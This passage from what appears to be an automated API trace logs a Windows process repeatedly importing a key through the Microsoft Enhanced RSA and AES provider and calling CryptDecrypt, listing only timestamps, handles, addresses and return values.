returned 1 [0122.013] CryptReleaseContext (hProv=0x767a88, dwFlags=0x0) returned 1 [0122.013] CryptReleaseContext (hProv=0x767a88, dwFlags=0x0) returned 1 [0122.013] CryptAcquireContextW (in: phProv=0x18a234, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18a234*=0x767b10) returned 1 [0122.013] CryptImportKey (in: hProv=0x767b10, pbData=0x2638cac, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18a1fc | out: phKey=0x18a1fc*=0x74f850) returned 1 [0122.014] CryptContextAddRef (hProv=0x767b10, pdwReserved=0x0, dwFlags=0x0) returned 1 [0122.014] CryptContextAddRef (hProv=0x767b10, pdwReserved=0x0, dwFlags=0x0) returned 1 [0122.014] CryptDuplicateKey (in: hKey=0x74f850, pdwReserved=0x0, dwFlags=0x0, phKey=0x18a1f0 | out: phKey=0x18a1f0*=0x4bc9400) returned 1 [0122.014] CryptContextAddRef (hProv=0x767b10, pdwReserved=0x0, dwFlags=0x0) returned 1 [0122.014] CryptSetKeyParam (hKey=0x4bc9400, dwParam=0x4, pbData=0x263941c*=0x1, dwFlags=0x0) returned 1 [0122.014] CryptSetKeyParam (hKey=0x4bc9400, dwParam=0x1, pbData=0x26393e8, dwFlags=0x0) returned 1 [0122.014] CryptDecrypt (in: hKey=0x4bc9400, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x26394fc, pdwDataLen=0x18a220 | out: pbData=0x26394fc, pdwDataLen=0x18a220) returned 1 [0122.014] CryptDecrypt (in: hKey=0x4bc9400, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2639540, pdwDataLen=0x18a220 | out: pbData=0x2639540, pdwDataLen=0x18a220) returned 0 [0122.014] CryptDestroyKey (hKey=0x74f850) returned 1 [0122.014] CryptReleaseContext (hProv=0x767b10, dwFlags=0x0) returned 1 [0122.014] CryptReleaseContext (hProv=0x767b10, dwFlags=0x0) returned 1 [0122.014] CryptAcquireContextW (in: phProv=0x18a234, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18a234*=0x767b98) returned 1 [0122.015] CryptImportKey (in: hProv=0x767b98, pbData=0x2639874, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18a1fc | out: phKey=0x18a1fc*=0x74f850) returned 1 [0122.015] CryptContextAddRef (hProv=0x767b98, pdwReserved=0x0, dwFlags=0x0) returned 1 [0122.015] CryptContextAddRef (hProv=0x767b98, pdwReserved=0x0, dwFlags=0x0) returned 1 [0122.015] CryptDuplicateKey (in: hKey=0x74f850, pdwReserved=0x0, dwFlags=0x0, phKey=0x18a1f0 | out: phKey=0x18a1f0*=0x4bc9480) returned 1 [0122.015] CryptContextAddRef (hProv=0x767b98, pdwReserved=0x0, dwFlags=0x0) returned 1 [0122.015] CryptSetKeyParam (hKey=0x4bc9480, dwParam=0x4, pbData=0x2639fe4*=0x1, dwFlags=0x0) returned 1 [0122.015] CryptSetKeyParam (hKey=0x4bc9480, dwParam=0x1, pbData=0x2639fb0, dwFlags=0x0) returned 1 [0122.015] CryptDecrypt (in: hKey=0x4bc9480, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x263a0c4, pdwDataLen=0x18a220 | out: pbData=0x263a0c4, pdwDataLen=0x18a220) returned 1 [0122.015] CryptDecrypt (in: hKey=0x4bc9480, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x263a10c, pdwDataLen=0x18a220 | out: pbData=0x263a10c, pdwDataLen=0x18a220) returned 0 [0122.015] CryptDestroyKey (hKey=0x74f850) returned 1 [0122.015] CryptReleaseContext (hProv=0x767b98, dwFlags=0x0) returned 1 [0122.015] CryptReleaseContext (hProv=0x767b98, dwFlags=0x0) returned 1 [0122.016] CryptAcquireContextW (in: phProv=0x18a234, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18a234*=0x767c20) returned 1 [0122.016] CryptImportKey (in: hProv=0x767c20, pbData=0x263a444, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18a1fc | out: phKey=0x18a1fc*=0x74f850) returned 1 [0122.016] CryptContextAddRef (hProv=0x767c20, pdwReserved=0x0, dwFlags=0x0) returned 1 [0122.016] CryptContextAddRef (hProv=0x767c20, pdwReserved=0x0, dwFlags=0x0) returned 1 [0122.016] CryptDuplicateKey (in: hKey=0x74f850, pdwReserved=0x0, dwFlags=0x0, phKey=0x18a1f0 | out: phKey=0x18a1f0*=0x4bc9500) returned 1 [0122.016] CryptContextAddRef (hProv=0x767c20, pdwReserved=0x0, dwFlags=0x0) returned 1 [0122.016] CryptSetKeyParam (hKey=0x4bc9500, dwParam=0x4, pbData=0x263abb4*=0x1, dwFlags=0x0) returned 1 [0122.017] CryptSetKeyParam (hKey=0x4bc9500, dwParam=0x1, pbData=0x263ab80, dwFlags=0x0) returned 1 [0122.017] CryptDecrypt (in: hKey=0x4bc9500, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x263ac94, pdwDataLen=0x18a220 | out: pbData=0x263ac94, pdwDataLen=0x18a220) returned 1 [0122.017] CryptDecrypt (in: hKey=0x4bc9500, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x263acdc, pdwDataLen=0x18a220 | out: pbData=0x263acdc, pdwDataLen=0x18a220) returned 0 [0122.017] CryptDestroyKey (hKey=0x74f850) returned 1 [0122.017] CryptReleaseContext (hProv=0x767c20, dwFlags=0x0) returned 1 [0122.017] CryptReleaseContext (hProv=0x767c20, dwFlags=0x0) returned 1 [0122.017] CryptAcquireContextW (in: phProv=0x18a234, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18a234*=0x767ca8) returned 1 [0122.018] CryptImportKey (in: hProv=0x767ca8, pbData=0x263b014, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18a1fc | out: phKey=0x18a1fc*=0x74f850) returned 1 [0122.018] CryptContextAddRef (hProv=0x767ca8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0122.018] CryptContextAddRef (hProv=0x767ca8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0122.018] CryptDuplicateKey (in: hKey=0x74f850, pdwReserved=0x0, dwFlags=0x0, phKey=0x18a1f0 | out: phKey=0x18a1f0*=0x4bc9580) returned 1 [0122.018] CryptContextAddRef (hProv=0x767ca8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0122.018] CryptSetKeyParam (hKey=0x4bc9580, dwParam=0x4, pbData=0x263b784*=0x1, dwFlags=0x0) returned 1 [0122.019] CryptSetKeyParam (hKey=0x4bc9580, dwParam=0x1, pbData=0x263b750, dwFlags=0x0) returned 1 [0122.019] CryptDecrypt (in: hKey=0x4bc9580, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x263b864, pdwDataLen=0x18a220 | out: pbData=0x263b864, pdwDataLen=0x18a220) returned 1 [0122.019] CryptDecrypt (in: hKey=0x4bc9580, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x263b8ac, pdwDataLen=0x18a220 | out: pbData=0x263b8ac, pdwDataLen=0x18a220) returned 0 [0122.019] CryptDestroyKey (hKey=0x74f850) returned 1 [0122.019] CryptReleaseContext (hProv=0x767ca8, dwFlags=0x0) returned 1 [0122.019] CryptReleaseContext (hProv=0x767ca8, dwFlags=0x0) returned 1 [0122.019] CryptAcquireContextW (in: phProv=0x18a234, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18a234*=0x767d30) returned 1 [0122.020] CryptImportKey (in: hProv=0x767d30, pbData=0x263bbe4, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18a1fc | out: phKey=0x18a1fc*=0x74f850) returned 1 [0122.020] CryptContextAddRef (hProv=0x767d30, pdwReserved=0x0, dwFlags=0x0) returned 1 [0122.020] CryptContextAddRef (hProv=0x767d30, pdwReserved=0x0, dwFlags=0x0) returned 1 [0122.020] CryptDuplicateKey (in: hKey=0x74f850, pdwReserved=0x0, dwFlags=0x0, phKey=0x18a1f0 | out: phKey=0x18a1f0*=0x4bc9600) returned 1 [0122.020] CryptContextAddRef (hProv=0x767d30, pdwReserved=0x0, dwFlags=0x0) returned 1 [0122.020] CryptSetKeyParam (hKey=0x4bc9600, dwParam=0x4, pbData=0x263c354*=0x1, dwFlags=0x0) returned 1 [0122.020] CryptSetKeyParam (hKey=0x4bc9600, dwParam=0x1, pbData=0x263c320, dwFlags=0x0) returned 1 [0122.020] CryptDecrypt (in: hKey=0x4bc9600, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x263c434, pdwDataLen=0x18a220 | out: pbData=0x263c434, pdwDataLen=0x18a220) returned 1 [0122.020] CryptDecrypt (in: hKey=0x4bc9600, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x263c47c, pdwDataLen=0x18a220 | out: pbData=0x263c47c, pdwDataLen=0x18a220) returned 0 [0122.020] CryptDestroyKey (hKey=0x74f850) returned 1 [0122.020] CryptReleaseContext (hProv=0x767d30, dwFlags=0x0) returned 1 [0122.020] CryptReleaseContext (hProv=0x767d30, dwFlags=0x0) returned 1 [0122.020] CryptAcquireContextW (in: phProv=0x18a234, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18a234*=0x767db8) returned 1 [0122.021] CryptImportKey (in: hProv=0x767db8, pbData=0x263c8c0, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18a1fc | out: phKey=0x18a1fc*=0x74f850) returned 1 [0122.021] CryptContextAddRef (hProv=0x767db8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0122.021] CryptContextAddRef (hProv=0x767db8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0122.021] CryptDuplicateKey (in: hKey=0x74f850, pdwReserved=0x0, dwFlags=0x0, phKey=0x18a1f0 | out: phKey=0x18a1f0*=0x4bc9680) returned 1 [0122.021] CryptContextAddRef (hProv=0x767db8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0122.021] CryptSetKeyParam (hKey=0x4bc9680, dwParam=0x4, pbData=0x263d030*=0x1, dwFlags=0x0) returned 1 [0122.021] CryptSetKeyParam (hKey=0x4bc9680, dwParam=0x1, pbData=0x263cffc, dwFlags=0x0) returned 1 [0122.021] CryptDecrypt (in: hKey=0x4bc9680, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x263d110, pdwDataLen=0x18a220 | out: pbData=0x263d110, pdwDataLen=0x18a220) returned 1 [0122.021] CryptDecrypt (in: hKey=0x4bc9680, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x263d158, pdwDataLen=0x18a220 | out: pbData=0x263d158, pdwDataLen=0x18a220) returned 0 [0122.021] CryptDestroyKey (hKey=0x74f850) returned 1 [0122.021] CryptReleaseContext (hProv=0x767db8, dwFlags=0x0) returned 1 [0122.021] CryptReleaseContext (hProv=0x767db8, dwFlags=0x0) returned 1 [0122.021] CryptAcquireContextW (in: phProv=0x18a234, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18a234*=0x767e40) returned 1 [0122.022] CryptImportKey (in: hProv=0x767e40, pbData=0x263d490, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18a1fc | out: phKey=0x18a1fc*=0x74f850) returned 1 [0122.022] CryptContextAddRef (hProv=0x767e40, pdwReserved=0x0, dwFlags=0x0) returned 1 [0122.022] CryptContextAddRef (hProv=0x767e40, pdwReserved=0x0, dwFlags=0x0) returned 1 [0122.022] CryptDuplicateKey (in: hKey=0x74f850, pdwReserved=0x0, dwFlags=0x0, phKey=0x18a1f0 | out: phKey=0x18a1f0*=0x4bc9700) returned 1 [0122.022] CryptContextAddRef (hProv=0x767e40, pdwReserved=0x0, dwFlags=0x0) returned 1 [0122.022] CryptSetKeyParam (hKey=0x4bc9700, dwParam=0x4, pbData=0x263dc00*=0x1, dwFlags=0x0) returned 1 [0122.022] CryptSetKeyParam (hKey=0x4bc9700, dwParam=0x1, pbData=0x263dbcc, dwFlags=0x0) returned 1 [0122.023] CryptDecrypt (in: hKey=0x4bc9700, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x263dce0, pdwDataLen=0x18a220 | out: pbData=0x263dce0, pdwDataLen=0x18a220) returned 1 [0122.023] CryptDecrypt (in: hKey=0x4bc9700, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x263dd24, pdwDataLen=0x18a220 | out: pbData=0x263dd24, pdwDataLen=0x18a220) returned 0 [0122.023] CryptDestroyKey (hKey=0x74f850) returned 1 [0122.023] CryptReleaseContext (hProv=0x767e40, dwFlags=0x0) returned 1 [0122.023] CryptReleaseContext (hProv=0x767e40, dwFlags=0x0) returned 1 [0122.023] CryptAcquireContextW (in: phProv=0x18a234, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18a234*=0x767ec8) returned 1 [0122.023] CryptImportKey (in: hProv=0x767ec8, pbData=0x263e058, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18a1fc | out: phKey=0x18a1fc*=0x74f850) returned 1 [0122.024] CryptContextAddRef (hProv=0x767ec8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0122.024] CryptContextAddRef (hProv=0x767ec8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0122.024] CryptDuplicateKey (in: hKey=0x74f850, pdwReserved=0x0, dwFlags=0x0, phKey=0x18a1f0 | out: phKey=0x18a1f0*=0x4bd5600) returned 1 [0122.024] CryptContextAddRef (hProv=0x767ec8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0122.024] CryptSetKeyParam (hKey=0x4bd5600, dwParam=0x4, pbData=0x263e7c8*=0x1, dwFlags=0x0) returned 1 [0122.024] CryptSetKeyParam (hKey=0x4bd5600, dwParam=0x1, pbData=0x263e794, dwFlags=0x0) returned 1 [0122.024] CryptDecrypt (in: hKey=0x4bd5600, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x263e8a8, pdwDataLen=0x18a220 | out: pbData=0x263e8a8, pdwDataLen=0x18a220) returned 1 [0122.024] CryptDecrypt (in: hKey=0x4bd5600, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x263e8ec, pdwDataLen=0x18a220 | out: pbData=0x263e8ec, pdwDataLen=0x18a220) returned 0 [0122.024] CryptDestroyKey (hKey=0x74f850) returned 1 [0122.024] CryptReleaseContext (hProv=0x767ec8, dwFlags=0x0) returned 1 [0122.024] CryptReleaseContext (hProv=0x767ec8, dwFlags=0x0) returned 1 [0122.024] CryptAcquireContextW (in: phProv=0x18a234, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18a234*=0x767f50) returned 1 [0122.025] CryptImportKey (in: hProv=0x767f50, pbData=0x263ec18, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18a1fc | out: phKey=0x18a1fc*=0x74f850) returned 1 [0122.025] CryptContextAddRef (hProv=0x767f50, pdwReserved=0x0, dwFlags=0x0) returned 1 [0122.025] CryptContextAddRef (hProv=0x767f50, pdwReserved=0x0, dwFlags=0x0) returned 1 [0122.025] CryptDuplicateKey (in: hKey=0x74f850, pdwReserved=0x0, dwFlags=0x0, phKey=0x18a1f0 | out: phKey=0x18a1f0*=0x4bd5640) returned 1 [0122.025] CryptContextAddRef (hProv=0x767f50, pdwReserved=0x0, dwFlags=0x0) returned 1 [0122.025] CryptSetKeyParam (hKey=0x4bd5640, dwParam=0x4, pbData=0x263f388*=0x1, dwFlags=0x0) returned 1 [0122.025] CryptSetKeyParam (hKey=0x4bd5640, dwParam=0x1, pbData=0x263f354, dwFlags=0x0) returned 1 [0122.025] CryptDecrypt (in: hKey=0x4bd5640, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x263f468, pdwDataLen=0x18a220 | out: pbData=0x263f468, pdwDataLen=0x18a220) returned 1 [0122.025] CryptDecrypt (in: hKey=0x4bd5640, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x263f4ac, pdwDataLen=0x18a220 | out: pbData=0x263f4ac, pdwDataLen=0x18a220) returned 0 [0122.025] CryptDestroyKey (hKey=0x74f850) returned 1 [0122.025] CryptReleaseContext (hProv=0x767f50, dwFlags=0x0) returned 1 [0122.025] CryptReleaseContext (hProv=0x767f50, dwFlags=0x0) returned 1 [0122.025] CryptAcquireContextW (in: phProv=0x18a234, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18a234*=0x767fd8) returned 1 [0122.026] CryptImportKey (in: hProv=0x767fd8, pbData=0x263f7d8, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18a1fc | out: phKey=0x18a1fc*=0x74f850) returned 1 [0122.026] CryptContextAddRef (hProv=0x767fd8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0122.026] CryptContextAddRef (hProv=0x767fd8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0122.026] CryptDuplicateKey (in: hKey=0x74f850, pdwReserved=0x0, dwFlags=0x0, phKey=0x18a1f0 | out: phKey=0x18a1f0*=0x4bd56c0) returned 1 [0122.026] CryptContextAddRef (hProv=0x767fd8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0122.026] CryptSetKeyParam (hKey=0x4bd56c0, dwParam=0x4, pbData=0x263ff48*=0x1, dwFlags=0x0) returned 1 [0122.026] CryptSetKeyParam (hKey=0x4bd56c0, dwParam=0x1, pbData=0x263ff14, dwFlags=0x0) returned 1 [0122.026] CryptDecrypt (in: hKey=0x4bd56c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2640028, pdwDataLen=0x18a220 | out: pbData=0x2640028, pdwDataLen=0x18a220) returned 1 [0122.026] CryptDecrypt (in: hKey=0x4bd56c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2640070, pdwDataLen=0x18a220 | out: pbData=0x2640070, pdwDataLen=0x18a220) returned 0 [0122.026] CryptDestroyKey (hKey=0x74f850) returned 1 [0122.026] CryptReleaseContext (hProv=0x767fd8, dwFlags=0x0) returned 1 [0122.027] CryptReleaseContext (hProv=0x767fd8, dwFlags=0x0) returned 1 [0122.027] CryptAcquireContextW (in: phProv=0x18a234, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18a234*=0x768060) returned 1 [0122.027] CryptImportKey (in: hProv=0x768060, pbData=0x26403a8, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18a1fc | out: phKey=0x18a1fc*=0x74f850) returned 1 [0122.027] CryptContextAddRef (hProv=0x768060, pdwReserved=0x0, dwFlags=0x0) returned 1 [0122.027] CryptContextAddRef (hProv=0x768060, pdwReserved=0x0, dwFlags=0x0) returned 1 [0122.027] CryptDuplicateKey (in: hKey=0x74f850, pdwReserved=0x0, dwFlags=0x0, phKey=0x18a1f0 | out: phKey=0x18a1f0*=0x4bd5740) returned 1 [0122.027] CryptContextAddRef (hProv=0x768060, pdwReserved=0x0, dwFlags=0x0) returned 1 [0122.028] CryptSetKeyParam (hKey=0x4bd5740, dwParam=0x4, pbData=0x2640b18*=0x1, dwFlags=0x0) returned 1 [0122.028] CryptSetKeyParam (hKey=0x4bd5740, dwParam=0x1, pbData=0x2640ae4, dwFlags=0x0) returned 1 [0122.028] CryptDecrypt (in: hKey=0x4bd5740, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2640bf8, pdwDataLen=0x18a220 | out: pbData=0x2640bf8, pdwDataLen=0x18a220) returned 1 [0122.028] CryptDecrypt (in: hKey=0x4bd5740, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2640c40, pdwDataLen=0x18a220 | out: pbData=0x2640c40, pdwDataLen=0x18a220) returned 0 [0122.028] CryptDestroyKey (hKey=0x74f850) returned 1 [0122.028] CryptReleaseContext (hProv=0x768060, dwFlags=0x0) returned 1 [0122.028] CryptReleaseContext (hProv=0x768060, dwFlags=0x0) returned 1 [0122.028] CryptAcquireContextW (in: phProv=0x18a234, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18a234*=0x7680e8) returned 1 [0122.029] CryptImportKey (in: hProv=0x7680e8, pbData=0x2640f80, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18a1fc | out: phKey=0x18a1fc*=0x74f850) returned 1 [0122.029] CryptContextAddRef (hProv=0x7680e8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0122.029] CryptContextAddRef (hProv=0x7680e8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0122.029] CryptDuplicateKey (in: hKey=0x74f850, pdwReserved=0x0, dwFlags=0x0, phKey=0x18a1f0 | out: phKey=0x18a1f0*=0x4bd57c0) returned 1 [0122.029] CryptContextAddRef (hProv=0x7680e8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0122.029] CryptSetKeyParam (hKey=0x4bd57c0, dwParam=0x4, pbData=0x26416f0*=0x1, dwFlags=0x0) returned 1 [0122.029] CryptSetKeyParam (hKey=0x4bd57c0, dwParam=0x1, pbData=0x26416bc, dwFlags=0x0) returned 1 [0122.029] CryptDecrypt (in: hKey=0x4bd57c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x26417d0, pdwDataLen=0x18a220 | out: pbData=0x26417d0, pdwDataLen=0x18a220) returned 1 [0122.029] CryptDecrypt (in: hKey=0x4bd57c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2641818, pdwDataLen=0x18a220 | out: pbData=0x2641818, pdwDataLen=0x18a220) returned 0 [0122.029] CryptDestroyKey (hKey=0x74f850) returned 1 [0122.029] CryptReleaseContext (hProv=0x7680e8, dwFlags=0x0) returned 1 [0122.029] CryptReleaseContext (hProv=0x7680e8, dwFlags=0x0) returned 1 [0122.029] CryptAcquireContextW (in: phProv=0x18a234, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18a234*=0x768170) returned 1 [0122.030] CryptImportKey (in: hProv=0x768170, pbData=0x2641b50, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18a1fc | out: phKey=0x18a1fc*=0x74f850) returned 1 [0122.030] CryptContextAddRef (hProv=0x768170, pdwReserved=0x0, dwFlags=0x0) returned 1 [0122.030] CryptContextAddRef (hProv=0x768170, pdwReserved=0x0, dwFlags=0x0) returned 1 [0122.030] CryptDuplicateKey (in: hKey=0x74f850, pdwReserved=0x0, dwFlags=0x0, phKey=0x18a1f0 | out: phKey=0x18a1f0*=0x4bd5840) returned 1 [0122.030] CryptContextAddRef (hProv=0x768170, pdwReserved=0x0, dwFlags=0x0) returned 1 [0122.030] CryptSetKeyParam (hKey=0x4bd5840, dwParam=0x4, pbData=0x26422c0*=0x1, dwFlags=0x0) returned 1 [0122.030] CryptSetKeyParam (hKey=0x4bd5840, dwParam=0x1, pbData=0x264228c, dwFlags=0x0) returned 1 [0122.030] CryptDecrypt (in: hKey=0x4bd5840, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x26423a0, pdwDataLen=0x18a220 | out: pbData=0x26423a0, pdwDataLen=0x18a220) returned 1 [0122.030] CryptDecrypt (in: hKey=0x4bd5840, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x26423e8, pdwDataLen=0x18a220 | out: pbData=0x26423e8, pdwDataLen=0x18a220) returned 0 [0122.030] CryptDestroyKey (hKey=0x74f850) returned 1 [0122.030] CryptReleaseContext (hProv=0x768170, dwFlags=0x0) returned 1 [0122.030] CryptReleaseContext (hProv=0x768170, dwFlags=0x0) returned 1 [0122.030] CryptAcquireContextW (in: phProv=0x18a234, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18a234*=0x7681f8) returned 1 [0122.031] CryptImportKey (in: hProv=0x7681f8, pbData=0x2642720, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18a1fc | out: phKey=0x18a1fc*=0x74f850) returned 1 [0122.031] CryptContextAddRef (hProv=0x7681f8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0122.031] CryptContextAddRef (hProv=0x7681f8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0122.031] CryptDuplicateKey (in: hKey=0x74f850, pdwReserved=0x0, dwFlags=0x0, phKey=0x18a1f0 | out: phKey=0x18a1f0*=0x4bd58c0) returned 1 [0122.031] CryptContextAddRef (hProv=0x7681f8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0122.031] CryptSetKeyParam (hKey=0x4bd58c0, dwParam=0x4, pbData=0x2642e90*=0x1, dwFlags=0x0) returned 1 [0122.032] CryptSetKeyParam (hKey=0x4bd58c0, dwParam=0x1, pbData=0x2642e5c, dwFlags=0x0) returned 1 [0122.032] CryptDecrypt (in: hKey=0x4bd58c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2642f70, pdwDataLen=0x18a220 | out: pbData=0x2642f70, pdwDataLen=0x18a220) returned 1 [0122.032] CryptDecrypt (in: hKey=0x4bd58c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2642fb8, pdwDataLen=0x18a220 | out: pbData=0x2642fb8, pdwDataLen=0x18a220) returned 0 [0122.032] CryptDestroyKey (hKey=0x74f850) returned 1 [0122.032] CryptReleaseContext (hProv=0x7681f8, dwFlags=0x0) returned 1 [0122.032] CryptReleaseContext (hProv=0x7681f8, dwFlags=0x0) returned 1 [0122.032] CryptAcquireContextW (in: phProv=0x18a234, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18a234*=0x768280) returned 1 [0122.032] CryptImportKey (in: hProv=0x768280, pbData=0x2643300, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18a1fc | out: phKey=0x18a1fc*=0x74f850) returned 1 [0122.033] CryptContextAddRef (hProv=0x768280, pdwReserved=0x0, dwFlags=0x0) returned 1 [0122.033] CryptContextAddRef (hProv=0x768280, pdwReserved=0x0, dwFlags=0x0) returned 1 [0122.033] CryptDuplicateKey (in: hKey=0x74f850, pdwReserved=0x0, dwFlags=0x0, phKey=0x18a1f0 | out: phKey=0x18a1f0*=0x4bd5940) returned 1 [0122.033] CryptContextAddRef (hProv=0x768280, pdwReserved=0x0, dwFlags=0x0) returned 1 [0122.033] CryptSetKeyParam (hKey=0x4bd5940, dwParam=0x4, pbData=0x2643a80*=0x1, dwFlags=0x0) returned 1 [0122.033] CryptSetKeyParam (hKey=0x4bd5940, dwParam=0x1, pbData=0x2643a4c, dwFlags=0x0) returned 1 [0122.033] CryptDecrypt (in: hKey=0x4bd5940, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2643b64, pdwDataLen=0x18a1f0 | out: pbData=0x2643b64, pdwDataLen=0x18a1f0) returned 1 [0122.033] CryptDecrypt (in: hKey=0x4bd5940, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2643bc4, pdwDataLen=0x18a220 | out: pbData=0x2643bc4, pdwDataLen=0x18a220) returned 1 [0122.033] CryptDecrypt (in: hKey=0x4bd5940, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2643c04, pdwDataLen=0x18a220 | out: pbData=0x2643c04, pdwDataLen=0x18a220) returned 0 [0122.034] CryptDestroyKey (hKey=0x74f850) returned 1 [0122.034] CryptReleaseContext (hProv=0x768280, dwFlags=0x0) returned 1 [0122.034] CryptReleaseContext (hProv=0x768280, dwFlags=0x0) returned 1 [0122.034] CryptAcquireContextW (in: phProv=0x18a234, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18a234*=0x768308) returned 1 [0122.035] CryptImportKey (in: hProv=0x768308, pbData=0x2643f5c, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18a1fc | out: phKey=0x18a1fc*=0x74f850) returned 1 [0122.035] CryptContextAddRef (hProv=0x768308, pdwReserved=0x0, dwFlags=0x0) returned 1 [0122.035] CryptContextAddRef (hProv=0x768308, pdwReserved=0x0, dwFlags=0x0) returned 1 [0122.035] CryptDuplicateKey (in: hKey=0x74f850, pdwReserved=0x0, dwFlags=0x0, phKey=0x18a1f0 | out: phKey=0x18a1f0*=0x4bd59c0) returned 1 [0122.035] CryptContextAddRef (hProv=0x768308, pdwReserved=0x0, dwFlags=0x0) returned 1 [0122.035] CryptSetKeyParam (hKey=0x4bd59c0, dwParam=0x4, pbData=0x26446cc*=0x1, dwFlags=0x0) returned 1 [0122.036] CryptSetKeyParam (hKey=0x4bd59c0, dwParam=0x1, pbData=0x2644698, dwFlags=0x0) returned 1 [0122.036] CryptDecrypt (in: hKey=0x4bd59c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x26447ac, pdwDataLen=0x18a220 | out: pbData=0x26447ac, pdwDataLen=0x18a220) returned 1 [0122.036] 